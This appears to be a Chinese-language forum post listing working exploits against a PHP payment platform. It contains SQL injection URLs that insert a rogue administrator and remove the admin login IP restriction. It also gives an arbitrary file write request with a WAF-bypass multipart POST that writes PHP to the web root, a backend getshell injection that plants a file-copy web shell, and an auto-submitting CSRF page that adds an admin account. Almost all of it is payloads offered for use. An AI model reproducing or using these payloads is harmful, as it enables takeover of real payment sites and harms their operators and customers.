sql注入
1)
x.x.x.x/Pay_UPALIWAP_callbackurl.html?sdcustomno=1
x.x.x.x/index.php?m=Pay&c=UPALIWAP&a=callbackurl&sdcustomno=1'
x.x.x.x/index.php?m=Pay&c=WftAliSm&a=callbackurl&orderid=1'
2) 需要代理账户
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
DATA
id=123&name=_log;insert into pay_admin(`id`,`username`,`password`,`groupid`) values ('101','admln','7aa5e695be95cdd64a88410a64dfe2c1','1');--+
3) index.php?m=user&c=api&a=ajaxGetIndustry
payload同上
4) Pay_Pay_getSignkey?code=123*&merid=222
5) SQL注入添加管理员
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert into pay_admin (`id`,`username`,`password`,`groupid`) values ('801','admln','7aa5e695be95cdd64a88410a64dfe2c1%27,'1');--+
6) SQL注入取消IP限制
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;update pay_websiteconfig set login_ip = '' where id=1
任意文件写入
/index.php?m=pay&c=UPALIWAP&a=file_writeTxt&filepath=./coder.php&source=<?php phpinfo();>
根目录生成 c.php 内容为 <?php phpinfo();>
绕过waf写入之转换为上传文件
POST /index.php?m=pay&c=UPALIWAP&a=file_writeTxt HTTP/1.1
Host: example.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: xxxxx
Connection: close
Content-Type: multipart/form-data; boundary=--------685764754
Content-Length: 202
----------685764754
Content-Disposition: form-data; name="filepath"
./coder.php
----------685764754
Content-Disposition: form-data; name="source"
ssb<?php phpinfo
();// 这里是将phpinfo与括号分成了俩行
----------685764754--
后台Getshell
manage_System_base.html
插入
manage_System_base.html',@copy($_REQUEST[x],$_REQUEST[c]),//
CSRF
<html lang="en">
<head>
<meta charset="UTF-8">
</head>
<body onload="document.forms[0].submit();">
<form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post">
<input type="hidden" name="username" value="sinfvnction">
<input type="hidden" name="password" value="hacksb">
<input type="hidden" name="reppassword" value="hacksb">
<input type="hidden" name="groupid" value="1">
</body>
</html>
请登录后查看回复内容